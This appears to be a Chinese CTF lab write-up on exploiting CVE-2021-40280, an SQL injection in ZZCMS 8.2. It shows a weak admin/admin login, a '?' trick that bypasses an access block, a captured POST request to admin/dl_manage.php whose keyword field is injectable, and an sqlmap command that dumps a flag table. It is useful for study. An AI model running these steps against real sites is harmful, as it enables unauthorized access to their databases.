CVE-2021-40280
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/dl_sendmail.php存在sql注入漏洞
弱口令 admin/admin 登录
直接访问,会阻止
但是在后面跟上问好参数就可以访问了! 这两条数据是我在测试的时候,添加的。
因为给的提示是在 /admin/dl_sendmail 所以尝试了这几个发送的 请求包,抓包后然后保存成文件然后再使用Sqlmap跑出
但是发现,Sqlmap都跑不出结果,最后尝试,这个查询功能的请求包进行发包,请求包如下:
4个发送邮箱点
查询功能点
POST /admin/dl_manage.php? HTTP/1.1
Host: eci-2ze1hvr9navfw3w1m42t.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://eci-2ze1hvr9navfw3w1m42t.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze1hvr9navfw3w1m42t.cloudeci1.ichunqiu.com/admin/dl_manage.php?
Cookie: zxbigclassid=1; zxsmallclassid=0; PHPSESSID=mbsjjubmt5h48ldqiv33gr5rs1
Upgrade-Insecure-Requests: 1
kind=tel&keyword=1234444&Submit=%E6%9F%A5%E6%89%BE
使用这个请求包,跑出了个延时注入。
然后根据以往的经验
sqlmap.py -r 1.txt --random-agent --batch -D zzmcs -T flag --dump